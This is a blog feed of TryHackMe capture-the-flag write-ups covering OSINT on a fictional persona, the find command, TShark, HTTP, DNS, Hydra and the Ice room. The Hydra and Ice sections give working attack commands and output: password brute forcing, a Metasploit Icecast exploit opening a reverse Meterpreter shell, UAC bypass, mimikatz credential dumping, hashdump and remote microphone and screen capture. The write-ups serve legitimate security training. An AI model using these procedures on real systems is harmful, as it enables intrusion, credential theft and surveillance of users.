DEV Community: Omri Bornstein

TryHackMe OhSINT

Omri Bornstein — Sat, 03 Jul 2021 10:53:34 +0000

TryHackMe OhSINT

References

Hammond, J. (2020). TryHackMe! OhSINT - METADATA & Research [YouTube Video]. In YouTube. https://youtu.be/oF0TQQmFu4w
OWoodfl1nt. (2019, March 3). OWoodfl1nt/people_finder. GitHub. https://github.com/OWoodfl1nt/people_finder/blob/master/README.md
OWoodflint. (2019, March 4). Twitter status. Twitter. https://twitter.com/OWoodflint/status/1102220421091463168
WiGLE.net. (2011). WiGLE: Wireless Network Mapping. wigle.net. https://www.wigle.net/
Woodflint, O. (2019, March 3). Oliver Woodflint Blog. Oliver Woodflint Blog; Oliver Woodflint Blog. https://oliverwoodflint.wordpress.com/author/owoodflint/

What is this users avatar of?

By running exiftool WindowsXP.jpg, the following output tells that OWoodflint is a possible link:

ExifTool Version Number         : 12.16
File Name                       : WindowsXP.jpg
Directory                       : .
File Size                       : 229 KiB
File Modification Date/Time     : 2021:04:10 14:52:00+10:00
File Access Date/Time           : 2021:04:10 14:51:59+10:00
File Inode Change Date/Time     : 2021:04:10 14:52:08+10:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
XMP Toolkit                     : Image::ExifTool 11.27
GPS Latitude                    : 54 deg 17' 41.27" N
GPS Longitude                   : 2 deg 15' 1.33" W
Copyright                       : OWoodflint
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
GPS Latitude Ref                : North
GPS Longitude Ref               : West
GPS Position                    : 54 deg 17' 41.27" N, 2 deg 15' 1.33" W

The Twitter profile @OWoodflint has a cat in its avatar.

Answer: cat

What city is this person in?

The GitHub user @OWoodfl1nt has a github repository OWoodfl1nt/people_finder, and it's README.md says: > # people_finder > Hi all, I am from London, I like taking photos and open source projects. > > Follow me on twitter: @OWoodflint > > This project is a new social network for taking photos in your home town. > > Project starting soon! Email me if you want to help out: OWoodflint@gmail.com

Answer: London

Whats the SSID of the WAP he connected to?

The Twitter profile @OWoodflint wrote in a Twitter status:

From my house I can get free wifi ;D

Bssid: B4:5D:50:AA:86:41 - Go nuts!
— 0x00000000000000000000 (@OWoodflint) March 3, 2019
The website https://www.wigle.net/ tells us that the BSSID B4:5D:50:AA:86:41 has an SSID of UnileverWiFi.

Answer: UnileverWiFi

Where has he gone on holiday?

According to Oliver Woodflint's website: > Im in New York right now, so I will update this site right away with new photos!

Answer: New York

What is this persons password?

Inside to Oliver Woodflint's website HTML code:

<p style="color:#ffffff;" class="has-text-color">pennYDr0pper.!</p>

Answer: pennYDr0pper.!

TryHackMe The find Command

Omri Bornstein — Thu, 24 Jun 2021 10:48:01 +0000

TryHackMe The `find` Command

References

Ahamed, I. (2020, May 13). The find command ~ THM Writeup. Medium; Medium. https://irshadahamedpro.medium.com/the-find-command-thm-writeup-10dba7722261
GNU. (2021). Findutils 4.8.0. GNU. https://www.gnu.org/software/findutils/manual/html_mono/find.html

Be more specific

Find all files whose name ends with `.xml`

find / to search for items in the root directory
-type f to filter for files
-name "*.xml" to filter for items with a .xml as a suffix

Answer: find / -type f -name "*.xml"

Find all files in the `/home` directory (recursive) whose name is `user.txt` (case insensitive)

find /home to search for items in the /home directory
-type f to filter for files
-iname user.txt to filter for case insensitive name pattern of user.txt

Answer: find /home -type f -iname user.txt

Find all directories whose name contains the word `exploits`:

find / to search for items in the root directory
-type d to filter for directories
-name "*exploits*" to filter for items with exploits substring in their name

Answer: find / -type d -name "*exploits*"

Know exactly what you're looking for

Find all files owned by the user `kittycat`

find / to search for items in the root directory
-type f to filter for files
-user kittycat to filter for items owned by the user kittycat

Answer: find / -type f -user kittycat

Find all files that are exactly 150 bytes in size

find / to search for items in the root directory
-type f to filter for files
-size 150c to filter for items of size 150 bytes

Answer: find / -type f -size 150c

Find all files in the `/home` directory (recursive) with size less than 2 KiB and extension `.txt`

find /home to search for items in the /home directory
-type f to filter for files
-size -2k to filter items of size less than 2 KiB
-name "*.txt" to filter for items with a .txt as a suffix

Answer: find /home -type f -size -2k -name "*.txt"

Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format)

find / to search for items in the root directory
-type f to filter for files
-perm 644 (octal format) to filter for items that are exactly readable and writeable by the owner, and readable by everyone else

Answer: find / -type f -perm 644

Find all files that are only readable by anyone (use octal format)

find / to search for items in the root directory
-type f to filter for files
-perm /444 (octal format) to filter for items that are only readable by anyone

Answer: find / -type f -perm /444

Find all files with write permission for the group `others`, regardless of any other permissions, with extension `.sh` (use symbolic format)

find / to search for items in the root directory
-type f to filter for files
-perm -o=w (symbolic format) to filter items write permission for the group others, regardless of any other permissions
-name "*.sh" to filter for items with a .sh as a suffix

Answer: find / -type f -perm -o=w -name "*.sh"

Find all files in the `/usr/bin` directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)

find /usr/bin to search for items in the /usr/bin directory
-type f to filter for files
-user root to filter for items owned by the user root
-perm -u=s (symbolic format) to filter for items that have at least the SUID permission

Answer: find /usr/bin -type f -user root -perm -u=s

Find all files that were not accessed in the last 10 days with extension `.png`

find /usr/bin to search for items in the root directory
-type f to filter for files
-atime +10 to filter for items that were not accessed in the last 10 days
* -name "*.png" to filter for items with a .png as a suffix

answer: find / -type f -atime +10 -name "*.png"

Find all files in the `/usr/bin` directory (recursive) that have been modified within the last 2 hours

find /usr/bin to search for items in the /usr/bin directory
-type f to filter for files
-mmin -120 to filter for items that have been modified within the last 2 hours (120 minutes)

Answer: find /usr/bin -type f -mmin -120

TryHackMe TShark

Omri Bornstein — Sat, 19 Jun 2021 02:20:41 +0000

TryHackMe TShark

References

DarkSec. (2021). TryHackMe TShark Official Walkthrough [YouTube Video]. In YouTube. https://youtu.be/tbXIFRS4u7I

Reading PCAP Files

How many packets are in the `dns.cap` file?

TShark's -r flag enable reading a PCAP file.
wc's -l flag counts the lines of a given input.

$ tshark -r dns.cap | wc -l
38

Answer: 38

How many A records are in the capture (including responses)?

TShark's -Y "dns.qry.type == 1" is used to filter DNS A records.

$ tshark -r dns.cap -Y "dns.qry.type == 1" | wc -l
6

Answer: 6

Which A record was present the most?

TShark's -T fields is used to specify the output's format.
TShark's -e dns.qry.name is specify which field to output.

$ tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name
www.netbsd.org
www.netbsd.org
GRIMM.utelsystems.local
GRIMM.utelsystems.local
GRIMM.utelsystems.local
GRIMM.utelsystems.local

Answer: GRIMM.utelsystems.local

DNS Exfil

How many packets are in this capture?

$ tshark -r task3.pcap | wc -l
125

Answer: 125

How many DNS queries are in this PCAP (excluding responses)?

$ tshark -r task3.pcap -Y "dns.flags.response == 0" | wc -l
56

Answer: 56

What is the DNS transaction ID of the suspicious queries (in hex)?

$ tshark -r task3.pcap -Y "dns.flags.response == 0" -T fields -e dns.id
0x0000beef

Answer: 0x0000beef

What is the string extracted from the DNS queries?

$ tshark -r task3.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name | cut -c1 | tr "\n" " " | sed 's/ //g'
MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5

Answer: MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5

What is the flag?

$ echo 'MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5' | base32 -d
flag{th1s_is_t0ugh_with0u7_tsh4rk!}

Flag: flag{th1s_is_t0ugh_with0u7_tsh4rk!}

TryHackMe HTTP in Detail

Omri Bornstein — Sat, 12 Jun 2021 06:41:36 +0000

TryHackMe HTTP in Detail

References

Try Hack Me. (2021). HTTP in detail - How the web works [YouTube Video]. In YouTube. https://youtu.be/XZyapIKV3Rw

What is HTTP(S)?

What does HTTP stand for?

Answer: HyperText Transfer Protocol

What does the S in HTTPS stand for?

Answer: Secure

On the mock webpage on the right there is an issue, once you've found it, click on it. What is the challenge flag?

The page does not support HTTPS, click on the lock next to the page's address.

Flag: THM{INVALID_HTTP_CERT}

Requests & Responses

Example Request:



GET / HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0
Referer: https://tryhackme.com/

Example Response:



HTTP/1.1 200 OK
Server: nginx/1.15.8
Date: Fri, 09 Apr 2021 13:34:03 GMT
Content-Type: text/html
Content-Length: 98

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    Welcome To TryHackMe.com
</body>
</html>

What HTTP protocol is being used in the above example?

Answer: HTTP/1.1

What response header tells the browser how much data to expect?

Answer: Content-Length

HTTP Methods

What method would be used to create a new user account?

According to the information provided in the question:

POST Request

This is used for submitting data to the web server and potentially creating new records.

Answer: POST

What method would be used to update your email address?

According to the information provided in the question:

PUT Request

This is used for submitting data to a web server to update information.

Answer: PUT

What method would be used to remove a picture you've uploaded to your account?

According to the information provided in the question:

DELETE Request

This is used for deleting information/records from a web server.

Answer: DELETE

What method would be used to view a news article?

According to the information provided in the question:

GET Request

This is used for getting information from a web server.

Answer: GET

HTTP Status Codes

What response code might you receive if you've created a new user or blog post article?

According to the information provided in the question:

201 - Created A resource has been created (for example a new user or new blog post).

Answer: 201

What response code might you receive if you've tried to access a page that doesn't exist?

According to the information provided in the question:

404 - Page Not Found The page/resource you requested does not exist.

Answer: 404

What response code might you receive if the web server cannot access its database and the application crashes?

According to the information provided in the question:

503 - Service Unavailable This server cannot handle your request as it's either overloaded or down for maintenance.

Answer: 503

What response code might you receive if you try to edit your profile without logging in first?

According to the information provided in the question:

401 - Not Authorised You are not currently allowed to view this resource until you have authorised with the web application, most commonly with a username and password.

Answer: 401

Headers

What header tells the web server what browser is being used?

According to the information provided in the question:

User-Agent: This is your browser software and version number, telling the web server your browser software helps it format the website properly for your browser and also some elements of HTML, JavaScript and CSS are only available in certain browsers.

Answer: User-Agent

What header tells the browser what type of data is being returned?

According to the information provided in the question:

Content-Type: This tells the client what type of data is being returned, i.e., HTML, CSS, JavaScript, Images, PDF, Video, etc. Using the Content-Type header the browser then knows how to process the data.

Answer: Content-Type

What header tells the web server which website is being requested?

According to the information provided in the question:

Host: Some web servers host multiple websites so by providing the Host headers you can tell it which one you require, otherwise you'll just receive the default website for the server.

Answer: Host

Cookies

Which header is used to save cookies to your computer?

According to the information provided in the question:

Cookies are saved when you receive a Set-Cookie header from a web server.

Answer: Set-Cookie

Making Requests

Make a `GET` request to `/room`

Request: ```http

GET /room HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0

* Response:
```http


HTTP/1.1 200 Ok
Server: nginx/1.15.8
Fri, 14 May 2021 18:35:9 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 233
Last-Modified: Fri, 14 May 2021 18:35:9 GMT

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    Welcome to the Room page THM{YOU'RE_IN_THE_ROOM}
</body>
</html>

Flag: THM{YOU'RE_IN_THE_ROOM}

Make a `GET` request to `/blog` and using the gear icon set the `id` parameter to `1` in the URL field

Request: ```http

GET /blog?id=1 HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0

* Response:
```http


HTTP/1.1 200 Ok
Server: nginx/1.15.8
Fri, 14 May 2021 18:36:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 231
Last-Modified: Fri, 14 May 2021 18:36:42 GMT

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    Viewing Blog article 1 THM{YOU_FOUND_THE_BLOG}
</body>
</html>

Flag: THM{YOU_FOUND_THE_BLOG}

Make a `DELETE` request to `/user/1`

Request: ```http

DELETE /user/1 HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0
Content-Length: 0

* Response:
```http


HTTP/1.1 200 Ok
Server: nginx/1.15.8
Fri, 14 May 2021 18:38:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 231
Last-Modified: Fri, 14 May 2021 18:38:32 GMT

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    The user has been deleted THM{USER_IS_DELETED}
</body>
</html>

Flag: THM{USER_IS_DELETED}

Make a `PUT` request to `/user/2` with the `username` parameter set to `admin`

Request: ```http

PUT /user/2 HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0
Content-Length: 14

username=admin

* Response:
```http


HTTP/1.1 200 Ok
Server: nginx/1.15.8
Fri, 14 May 2021 18:40:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 232
Last-Modified: Fri, 14 May 2021 18:40:30 GMT

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    Username changed to admin THM{USER_HAS_UPDATED}
</body>
</html>

Flag: THM{USER_HAS_UPDATED}

`POST` the `username` of `thm` and a `password` of `letmein` to `/login`

Request: ```http

POST /login HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0
Content-Length: 33

username=thm&password=letmein

* Response:
```http


HTTP/1.1 200 Ok
Server: nginx/1.15.8
Fri, 14 May 2021 18:42:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 237
Last-Modified: Fri, 14 May 2021 18:42:50 GMT

<html>
<head>
    <title>TryHackMe</title>
</head>
<body>
    You logged in! Welcome Back THM{HTTP_REQUEST_MASTER}
</body>
</html>

Flag: THM{HTTP_REQUEST_MASTER}

TryHackMe DNS in Detail

Omri Bornstein — Sat, 05 Jun 2021 05:50:28 +0000

TryHackMe DNS in Detail

References

Try Hack Me. (2021). DNS in Detail - How the web works [YouTube Video]. In YouTube. https://youtu.be/jpTY1S5vs9k

What is DNS?

What does DNS Stand for?

According to the information provided in the question:

DNS (Domain Name System) provides a simple way for us to communicate with devices on the internet without remembering complex numbers.

Answer: Domain Name System

Domain Hierarchy

What is the maximum length of a subdomain?

According to the information provided in the question:

A subdomain name has the same creation restrictions as a Second-Level Domain, being limited to 63 characters and can only use a-z 0-9 and hyphens (cannot start or end with hyphens or have consecutive hyphens).

Answer: 63

Which of the following characters cannot be used in a subdomain: `3`, `b`, `_` or `-`?

Answer: _

What is the maximum length of a domain name?

According to the information provided in the question:

You can use multiple subdomains split with periods to create longer names, such as jupiter.servers.tryhackme.com. But the maximum length must be kept below 253 characters.

Answer: 253

What type of TLD is `.co.uk`?

According to the information provided in the question:

There are two types of TLD, gTLD (Generic Top Level) and ccTLD (Country Code Top Level Domain).

Answer: ccTLD

Record Types

What type of record would be used to advise where to send email?

According to the information provided in the question:

MX Record

These records resolve to the address of the servers that handle the email for the domain you are querying...

Answer: MX

What type of record handles IPv6 addresses?

According to the information provided in the question:

AAAA Record

These records resolve to IPv6 addresses, for example 2606:4700:20::681a:be5

Answer: AAAA

Making A Request

What field specifies how long a DNS record should be cached for?

According to the information provided in the question:

DNS records all come with a TTL (Time To Live) value. This value is a number represented in seconds that the response should be saved for locally until you have to look it up again.

Answer: TTL

What type of DNS Server is usually provided by your ISP?

According to the information provided in the question:

A Recursive DNS Server is usually provided by your ISP, but you can also choose your own.

Answer: recursive

What type of server holds all the records for a domain?

According to the information provided in the question:

An authoritative DNS server is the server that is responsible for storing the DNS records for a particular domain name and where any updates to your domain name DNS records would be made.

Answer: authoritative

Practical

What is the CNAME of `shop.website.thm`?

Using the interactive terminal provided:

user@thm:~$ nslookup --type=CNAME shop.website.thm
Server: 127.0.0.53
Address: 127.0.0.53#53

Non-authoritative answer:
shop.website.thm canonical name = shops.myshopify.com

Answer: shops.myshopify.com

What is the value of the TXT record of website.thm?

Using the interactive terminal provided:

user@thm:~$ nslookup --type=TXT website.thm
Server: 127.0.0.53
Address: 127.0.0.53#53

Non-authoritative answer:
website.thm text = "THM{7012BBA60997F35A9516C2E16D2944FF}"

Answer: THM{7012BBA60997F35A9516C2E16D2944FF}

What is the numerical priority value for the MX record?

Using the interactive terminal provided:

user@thm:~$ nslookup --type=MX website.thm
Server: 127.0.0.53
Address: 127.0.0.53#53

Non-authoritative answer:
website.thm mail exchanger = 30 alt4.aspmx.l.google.com

Answer: 30

What is the IP address for the A record of `www.website.thm`?

Using the interactive terminal provided:

user@thm:~$ nslookup --type=A website.thm
Server: 127.0.0.53
Address: 127.0.0.53#53

Non-authoritative answer:
Name: website.thm
Address: 10.10.10.10

Answer: 10.10.10.10

TryHackMe Hydra

Omri Bornstein — Sat, 29 May 2021 06:05:55 +0000

TryHackMe Hydra

References

DarkSec. (2020). TryHackMe Hydra Official Walkthrough [YouTube Video]. In YouTube. https://youtu.be/8fs_7bm88GY

Use Hydra to brute force Molly's web password. What is flag 1?

Brute force Molly's password with hydra:

$ hydra -l molly -P rockyou.txt <MACHINE_IP> http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect."
[80][http-post-form] host: <MACHINE_IP>   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found

<div class="jumbotron text-center">
    <h1>THM{2673a7dd116de68e85c48ec0b1f2612e}</h1>
</div>

Flag 1: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to brute force Molly's SSH password. What is flag 2?

Use Hydra's SSH along with the rockyou.txt password list to brute force Molly's server password:

$ hydra -l molly -P rockyou.txt <MACHINE_IP> ssh
[22][ssh] host: <MACHINE_IP>   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found

Log-in to Molly's server using her SSH credentials:

$  ssh molly@<MACHINE_IP>
molly@<MACHINE_IP>'s password: butterfly
molly@ip-10-10-66-163:~$ ls
flag2.txt
molly@ip-10-10-66-163:~$ cat flag2.txt 
THM{c8eeb0468febbadea859baeb33b2541b}

Flag 2: THM{c8eeb0468febbadea859baeb33b2541b}

TryHackMe Ice

Omri Bornstein — Wed, 19 May 2021 06:55:25 +0000

TryHackMe Ice

Recon

Launch a scan against our target machine

$ sudo nmap -sS -sV <MACHINE_IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 19:23 AEST
Nmap scan report for <MACHINE_IP>
Host is up (0.32s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http         Icecast streaming media server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.04 seconds

What port is Microsoft Remote Desktop open on?

Answer: 3389

What service did nmap identify as running on port 8000?

Answer: Icecast

What does Nmap identify as the hostname of the machine?

Answer: DARK-PC

Gain Access

What type of vulnerability is it (according to https://www.cvedetails.com)?

https://www.cvedetails.com/cve/CVE-2004-1561/

Answer: Execute Code Overflow

What is the CVE number for this vulnerability?

Answer: CVE-2004-1561

What is the full path (starting with exploit) for the Metasploit exploitation module?

msf6 > search icecast

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

Answer: exploit/windows/http/icecast_header

What is the only required setting which currently is blank?

msf6 exploit(windows/http/icecast_header) > show options

Module options (exploit/windows/http/icecast_header):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   8000             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Answer: RHOSTS

Escalate

What's the name of the shell we have now?

msf6 exploit(windows/http/icecast_header) > set RHOSTS <MACHINE_IP>
RHOSTS => <MACHINE_IP>
msf6 exploit(windows/http/icecast_header) > set LHOST tun0
LHOST => <OPENVPN_IP>
msf6 exploit(windows/http/icecast_header) > exploit 

[*] Started reverse TCP handler on <OPENVPN_IP>:4444 
[*] Sending stage (175174 bytes) to <MACHINE_IP>
[*] Meterpreter session 1 opened (<OPENVPN_IP>:4444 -> <MACHINE_IP>:49197) at 2021-04-20 19:39:24 +1000

meterpreter > sysinfo

Answer: meterpreter

What user was running that Icecast process?

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User          Path
 ---   ----  ----                  ----  -------  ----          ----
 0     0     [System Process]
 4     0     System
 144   2676  WinSAT.exe            x64   1
 416   4     smss.exe
 500   692   svchost.exe
 544   536   csrss.exe
 588   692   svchost.exe
 592   536   wininit.exe
 604   584   csrss.exe
 652   584   winlogon.exe
 692   592   services.exe
 700   592   lsass.exe
 708   592   lsm.exe
 816   692   svchost.exe
 884   692   svchost.exe
 932   692   svchost.exe
 1008  816   WmiPrvSE.exe
 1016  692   svchost.exe
 1020  692   vds.exe
 1052  692   svchost.exe
 1188  692   svchost.exe
 1292  692   sppsvc.exe
 1300  500   dwm.exe               x64   1        Dark-PC\Dark  C:\Windows\System32\dwm.exe
 1316  1288  explorer.exe          x64   1        Dark-PC\Dark  C:\Windows\explorer.exe
 1368  692   spoolsv.exe
 1396  692   svchost.exe
 1452  692   taskhost.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\taskhost.exe
 1564  692   amazon-ssm-agent.exe
 1640  692   LiteAgent.exe
 1680  692   svchost.exe
 1820  692   Ec2Config.exe
 2036  500   Defrag.exe
 2060  692   svchost.exe
 2280  1316  Icecast2.exe          x86   1        Dark-PC\Dark  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2472  544   conhost.exe
 2480  692   TrustedInstaller.exe
 2576  692   SearchIndexer.exe
 2640  604   conhost.exe           x64   1
 2676  692   taskhost.exe          x64   1
 2716  816   rundll32.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\rundll32.exe
 2744  2716  dinotify.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\dinotify.exe

Answer: Dark

What build of Windows is the system?

meterpreter > sysinfo 
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Answer: 7601

What is the architecture of the process we're running?

Answer: x64

What is the full path for the first returned exploit from the local exploit suggester?

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.170.20 - Collecting local exploits for x86/windows...
[*] 10.10.170.20 - 37 exploit checks are being tried...
[+] 10.10.170.20 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Answer: exploit/windows/local/bypassuac_eventvwr

What is the name of the incorrect option for `exploit/windows/local/bypassuac_eventvwr`?

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > show options 

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

Answer: LHOST

What permission listed by `getprivs` allows us to take ownership of files?

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST tun0
LHOST => <OPENVPN_IP>
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on <OPENVPN_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.170.20
[*] Meterpreter session 2 opened (<OPENVPN_IP>:4444 -> 10.10.170.20:49215) at 2021-04-20 19:54:34 +1000
[*] Cleaning up registry keys ...

meterpreter > sessions 
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions -i 2
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Answer: SeTakeOwnershipPrivilege

Looting

What's the name of the printer spool service?

meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 1368  692   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe

Answer: spoolsv.exe

What user is listed by `getuid`?

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1432 to 1368...
[*] Migration completed successfully.
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Answer: NT AUTHORITY\SYSTEM

Which `kiwi` command allows up to retrieve all credentials?

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1432 to 1368...
[*] Migration completed successfully.
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)

Answer: creds_all

What is Dark's password?

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

Answer: Password01!

What command allows us to dump all of the password hashes stored on the system?

meterpreter > help
Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Post-Exploitation

Answer: hashdump

what command allows us to watch the remote user's desktop in real time?

meterpreter > help
Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    screenshare    Watch the remote user desktop in real time

Answer: screenshare

How about if we wanted to record from a microphone attached to the system?

meterpreter > help
Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds

Answer: record_mic

What command allows us to modify timestamps of files on the system?

meterpreter > help
Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Answer: timestomp

